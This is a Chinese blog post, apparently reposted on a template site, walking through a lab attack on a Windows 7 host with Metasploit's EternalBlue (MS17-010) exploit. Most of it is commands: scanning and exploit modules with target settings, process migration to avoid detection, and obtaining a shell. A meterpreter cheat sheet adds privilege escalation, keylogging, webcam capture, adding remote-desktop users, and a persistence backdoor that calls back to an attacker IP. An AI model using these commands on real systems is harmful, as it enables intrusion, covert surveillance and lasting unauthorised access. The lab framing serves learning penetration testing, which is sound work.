记一次MSF永恒之蓝入侵win7系统实验

这篇具有很好参考价值的文章主要介绍了记一次MSF永恒之蓝入侵win7系统实验。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

 文章来源地址https://www.toymoban.com/news/detail-638941.html

目录

1.环境搭建

2.实验开始

1# 保证两个主机之间可以ping通

2# kali打开msfconsole

3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010)

4# 获取目标机cmd 

5# meterpreter基础命令


1.环境搭建

攻击源ip:192.168.193.130     #系统:kali      镜像下载地址:点击跳转

 靶 机  ip:192.168.193.135    #系统:win7     镜像下载地址:点击跳转

2.实验开始

1# 保证两个主机之间可以ping通

kali永恒之蓝渗透win7,linux,网络安全

kali永恒之蓝渗透win7,linux,网络安全

2# kali打开msfconsole

 msfdb init && msfconsole

 kali永恒之蓝渗透win7,linux,网络安全

 

可以看到msf进入界面还是很漂亮的,交互式前缀变为msf6就是打开成功了

(kali是默认安装msf的,不过是社区版的)

3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010)

search ms17-010

 kali永恒之蓝渗透win7,linux,网络安全

 可以看到有exploit和auxiliary

我们可以使用

use auxiliary/scanner/smb/smb_ms17_010      #使用该模块 (也可以用序号代替)

set RHOSTS 192.168.193.135                         #设置目标ip地址

run                                                                     #运行

#如果结果中出现`Host is likely VULNERABLE to MS17-010`

则说明主机很可能存在永恒之蓝漏洞

 结果同上,我们可以选择一个exploit进行攻击了

use exploit/windows/smb/ms17_010_eternalblue 

show  options     #查看需要配置的参数

set RHOSTS 192.168.193.135                  #目标ip

set LHOST eth0                                         #源ip (kali默认eth0网卡,我们可以简略)

run

kali永恒之蓝渗透win7,linux,网络安全

4# 获取目标机cmd 

之后出现以上字样则表示成功入侵,进入meterpreter界面

由于通过msf得到的会话容易被发现,导致后渗透失败。

因此我们可以把shell的进程迁移绑定到目标机正常的进程中 

getpid   #获取该会话进程pid

ps         #获取目标机所有进程及pid

kali永恒之蓝渗透win7,linux,网络安全 

 migrate 2824     #迁移到2824进程中,因为该进程是一个稳定的进程

kali永恒之蓝渗透win7,linux,网络安全 

 之后输入shell,获取目标cmd

kali永恒之蓝渗透win7,linux,网络安全

如果出现乱码情况,输入chcp 437,即可

我可以用一些cmd的基础命令来验明获取的目标机信息,比如ipconfig

kali永恒之蓝渗透win7,linux,网络安全

 

到此,我们已经获取了目标机的cmd权限

meterpreter是msf里面一个非常厉害的后渗透模块,有很多的功能及作用,在这里就不再过多赘述。

5# meterpreter基础命令

这里是一些msf的基础命令:
Back:返回
Connect:远程连接主机,主要用于内网渗透
Jobs:查看目前msfconsole上存在哪些任务
Kill:终止某任务
Search:查找模块,漏洞
Set:用以配置模块
Unset:重新设置
Setg:全局更改,配置完后,永久保存
Payload:攻击模块
Show:显示
Use:使用某模块

meterpreter:
background#返回,把meterpreter后台挂起

bglist#提供所有正在运行的后台脚本的列表

sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
close# 关闭通道

interact id #切换进一个信道

run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本

getwd 或者pwd # 查看当前工作目录  

ls  #
Cd

mkdir lltest2  #只能在当前目录下创建文件夹
rmdir lltest2  #只能删除当前目录下文件夹

getlwd   或者 lpwd   #操作攻击者主机 查看当前目录

lcd /tmp   #操作攻击者主机 切换目录

cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容

upload /tmp/hack.txt C:\\lltest  # 上传文件到目标机上

download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上

edit c:\\1.txt #编辑或创建文件  没有的话,会新建文件

getsystem       #会自动利用各种各样的系统漏洞来进行权限提升

getuid           #查看对方正在运行的用户
ps              #列出所有的进程
getpid          #返回运行meterpreter的id号

sysinfo         #产看系统信息和体系结构

shell           #切换到cmd的系统权限方式

exit           #退出shell会话返回meterpreter或终止meterpreter

getdesktop    截取目标主机当前桌面会话窗口

run webcam -p /var/www    #在/var/www目录监控目标主机的摄像头

keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

后门植入:
run persistence –h  #查看帮助
run persistence -X -i 5 -p 4444 -r 192.168.1.159
#-X指定启动的方式为开机自启动;-i反向连接的时间间隔;–r 指定攻击者的ip

远控:
run getgui -e #开启远程桌面
run getgui -u user1 -p 123   #添加用户
run getgui -f 4444 –e   #3389端口转发到6661
enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接,这方法有点问题,上传了exe但是启动不了

keyscan_start  #开始键盘记录
keyscan_dump   #导出记录数据
keyscan_stop #结束键盘记录

 OK,如果对你感觉对你帮助,点个赞吧!(比心)

 

 

到了这里,关于记一次MSF永恒之蓝入侵win7系统实验的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲

    2024年02月12日
    浏览(40)
  • Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

    一、永恒之蓝概述 二、SMB协议 三、准备工作 四、漏洞复现 1、主机发现 2、端口扫描 3、利用模块 五、演示功能 1.获取cmd 2.捕获屏幕 3.上传文件 4.下载文件 5.远程登录 6.上传后门 7.免杀加壳 8.运行wannacry 9.清除日志 六、预防方案 1.打开防火墙 2.安装杀毒软件 3.禁用445端口 

    2023年04月16日
    浏览(50)
  • kali木马入侵win7系统

    VMWare16百度网盘 提取码:ljb3 kali百度网盘 提取码:v6zf win7镜像百度网盘 提取码:ws1u -p 是选择载荷 -f 是选择输出格式 检测到之后输入shell即可

    2024年02月11日
    浏览(44)
  • MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口)                              2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作 :

    2024年02月08日
    浏览(49)
  • kali入侵win7(转载)

    前言: 本文的目的并不是教会学者入侵win7主机, 而是被入侵之后怎么反制并且做好下一步的防范 以及查到攻击者的蛛丝马迹 攻击原理: 利用未修复永恒之蓝的445端口漏洞入侵目标主机 演示设备: 主机 IP kali Linux 10.11.4.3 Windows7 10.11.4.152 (win7条件为无防火墙,无杀软) 攻击前准备

    2024年02月04日
    浏览(77)
  • 记一次阿里云被入侵的解决方案(小白攻略欢迎大佬指点)

    目录 前言: 寻找挖矿进程之旅: 我的处理思路: 故事就发生在2022年11月23日,一个舒适的下午。我不知怎的突然想在企业网络环境下通过我的Xshell7 连接我的阿里云ESC服务器。顺便检查一下我1年前自己搭的小破站是否还健在(域名备案失效了,我本想去检查一下服务在不在

    2024年01月18日
    浏览(41)
  • Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010)

    ●环境: 攻击机:Linux kali(IP:192.168.107.129) 靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143) 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的! ●永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病

    2024年02月11日
    浏览(41)
  • 网安-入门永恒之蓝/黑

    实验环境:win7,kali 实验目的:拿到win7管理员权限 扫描该网段 nmap -sP 192.168.164.0/24,查看win7ip,也可在win7上查询 扫描端口,445,永恒之蓝是通过445端口进行攻击的 masscan --rate=10000 -p1-65535 192.168.164.128 测试连通性,互相ping通 输入命令masfconsole,进入框架 输入命令search ms17-0

    2024年01月18日
    浏览(44)
  • 网络攻防——永恒之蓝

    1.引言     让一个不爱学习的人整天蒙英语题,听张宇的视频实在是枯燥了点,于是决定看看网安,积累积累一些有趣的玩意儿。然后,自己不是专业的,也不是为了工作,可能会查阅大佬的博文,然后把概念借鉴过来,会留下参考链接的,如果博主不同意引用直接评论

    2023年04月26日
    浏览(77)
  • 渗透基础+永恒之蓝演练

    渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如涉及缺陷和技术缺陷。渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、技

    2024年02月08日
    浏览(54)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包